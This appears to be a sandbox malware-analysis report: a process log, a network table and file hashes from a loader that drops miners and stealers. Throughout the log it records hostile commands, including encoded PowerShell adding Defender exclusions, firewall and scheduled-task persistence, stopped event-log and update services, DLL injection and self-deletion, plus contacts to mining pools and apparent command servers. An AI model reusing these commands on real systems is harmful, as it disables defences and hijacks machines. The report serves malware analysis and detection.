C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4880 -ip 4880

C:\Users\Admin\AppData\Local\Temp\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"

C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe

"C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe

"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe

"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe

"xfAk7rC2FeEN35Y8o.exe"

C:\Windows\system32\attrib.exe

attrib +H "xfAk7rC2FeEN35Y8o.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 728

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2528 -ip 2528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2528 -ip 2528

C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe

"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_8.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_9.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p4632370330209207692137030328 -oextracted

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 644

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 2420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1084 -ip 1084

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2528 -ip 2528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 892

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 972

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "FLWCUERA"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "FLWCUERA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1068

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WSNKISKT"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WSNKISKT"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADcAMQAwADAAMQBcAEcAegB4AHoAdQBoAGUAagBkAGEAYgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARwB6AHgAegB1AGgAZQBqAGQAYQBiAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABrAGoAaABrAGgAawBoAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAGsAagBoAGsAaABrAGgAawAuAGUAeABlAA==

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6900" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2528 -ip 2528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1164

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
FI 109.107.182.3:80 109.107.182.3 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 3.182.107.109.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 20.113.35.45:38357 tcp
DE 141.95.211.148:46011 tcp
US 8.8.8.8:53 148.211.95.141.in-addr.arpa udp
RU 5.42.65.31:48396 tcp
DE 185.172.128.19:80 tcp
HK 154.92.15.189:443 tcp
US 8.8.8.8:53 udp
US 172.67.206.188:443 racerecessionrestrai.site tcp
NL 94.156.67.176:13781 tcp
DE 185.172.128.79:80 185.172.128.79 tcp
HK 154.92.15.189:80 app.alie3ksgaa.com tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 180.213.67.172.in-addr.arpa udp
US 20.242.39.171:443 tcp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
DE 144.76.1.85:25894 tcp
US 172.67.177.31:443 tcp
US 8.8.8.8:53 31.177.67.172.in-addr.arpa udp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 server10.thestatsfiles.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.l.google.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server10.thestatsfiles.ru tcp
US 8.8.8.8:53 walkinglate.com udp
GB 142.251.29.127:19302 stun.l.google.com udp
US 104.21.23.184:443 walkinglate.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 127.29.251.142.in-addr.arpa udp
US 8.8.8.8:53 184.23.21.104.in-addr.arpa udp
US 8.8.8.8:53 udp
BG 185.82.216.96:443 server10.thestatsfiles.ru tcp
US 8.8.8.8:53 joxi.net udp
US 172.67.162.70:80 joxi.net tcp
US 172.67.162.70:443 joxi.net tcp
US 8.8.8.8:53 70.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
US 8.8.8.8:53 udp
N/A 20.49.150.241:443 tcp
US 8.8.8.8:53 qualifiedbehaviorrykej.site udp
US 104.21.35.143:443 qualifiedbehaviorrykej.site tcp
US 8.8.8.8:53 143.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 combinethemepiggerygoj.site udp
US 172.67.137.14:443 combinethemepiggerygoj.site tcp
US 8.8.8.8:53 14.137.67.172.in-addr.arpa udp
US 8.8.8.8:53 weedpairfolkloredheryw.site udp
US 104.21.40.14:443 weedpairfolkloredheryw.site tcp
US 8.8.8.8:53 14.40.21.104.in-addr.arpa udp
RU 185.215.113.68:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
DE 185.221.198.109:80 185.221.198.109 tcp
NL 195.20.16.153:80 195.20.16.153 tcp
DE 185.221.198.109:80 185.221.198.109 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 109.198.221.185.in-addr.arpa udp
US 8.8.8.8:53 153.16.20.195.in-addr.arpa udp
N/A 20.49.150.241:443 tcp
US 8.8.8.8:53 zeph-eu2.nanopool.org udp
N/A 20.49.150.241:443 tcp
FR 163.172.171.111:10943 zeph-eu2.nanopool.org tcp
NL 80.79.4.61:18236 tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
FR 163.172.171.111:10943 zeph-eu2.nanopool.org tcp
NL 80.79.4.61:18236 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 expenditureddisumilarwo.site udp
US 172.67.133.222:443 expenditureddisumilarwo.site tcp
US 8.8.8.8:53 222.133.67.172.in-addr.arpa udp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
N/A 185.172.128.90:80 tcp
US 8.8.8.8:53 udp
N/A 5.42.64.33:80 tcp
US 8.8.8.8:53 udp
GB 173.222.13.40:80 tcp
GB 96.17.179.193:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 80.79.4.61:18236 tcp
NL 80.79.4.61:18236 tcp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 172.67.177.31:443 tcp
US 8.8.8.8:53 udp

Files

memory/4376-1-0x00000000006B0000-0x0000000000AB8000-memory.dmp

memory/4376-0-0x00000000006B0000-0x0000000000AB8000-memory.dmp

memory/4376-2-0x00000000006B0000-0x0000000000AB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

MD5 e71c6ec2d3b302698ab773bcebffdce6
SHA1 6d53138c3cbb5b25c35d2dbf4f72c9a5202d132c
SHA256 949290efa61151bdc86b73371718f8bcee7348ea0a04c272b841727b8766857d
SHA512 9430121a31bbd999ddbb6ad7a5fe7a4eb711ee40acc1b06cafb3cb1effe8d8660e72b6718277b943cbe22edd4e15f254fc77f70bf72132d33a5fd8a03c6e33e4

memory/4888-14-0x00000000000D0000-0x00000000004D8000-memory.dmp

memory/4376-13-0x00000000006B0000-0x0000000000AB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

MD5 c8a13100238bb6863759fe63ee22f763
SHA1 4f917c6f03bd47fe7e7cc6696e784cc197c39bf9
SHA256 befd0b9a0ff1481e7bfa5e0acb934af7e37ffaf8a3205dbc53487a9779906f86
SHA512 52e77564e7e02560ac3db34fcc8ce5dbe177ef8fee7e94549445914e94c87503a6a4b77433337a402c025e96c79ebccfb71cfa0386a107e728c1fbb265b12fc7

memory/4888-16-0x00000000000D0000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe

MD5 73ac24985a312bdff6c71c1fe7cffed1
SHA1 ce01343d352af9318db7ba950850d88383e7cbbe
SHA256 90fa2d23ecca8106478558c762845c190c424cb4a29ce07117a1213b9f331df3
SHA512 5a8151e7427f2f59b6d9850ddb911466424fac03d18efc82a6243cfa2420868a67bbfc96759a53283540bc94b4435c409d65ea2dbfb8a15aa35d62e0399266b9

\??\c:\users\admin\appdata\local\temp\F59E91F8

MD5 5cac70fbe2fc9869397bf1989e592841
SHA1 cc522bec3c1772269465799d35268630248e801b
SHA256 17e571023337ad513deb4d436c17573b6ab3c9ebf2a3e30425c3f5fa9a638806
SHA512 f56d8d7a996401404b850b6503960ea17d68fe56acbc06de8fa9c39b20dd7f01d24837283f459655ac4efb3da10a8864623cbb041ca9ad81bc9afd1ecf9b5fb9

memory/4888-17-0x00000000000D0000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe

MD5 e2f4faf11f08e6ae457f6d0dff9660a5
SHA1 cfc6f9f3a8461b66805e387326450d6814b83624
SHA256 2f8e208a96e38c0865e767978caf02bd719e6acfb6c527dcdfc1e7f83a2e9835
SHA512 a66e391d48dc3599a4b90dda2cbb0439b72275df70cdab8777a2712e6b4b1c18def880b85a3b067ededb9c698c9b0676762f654ca88e5efab0996fab7ee4d98e

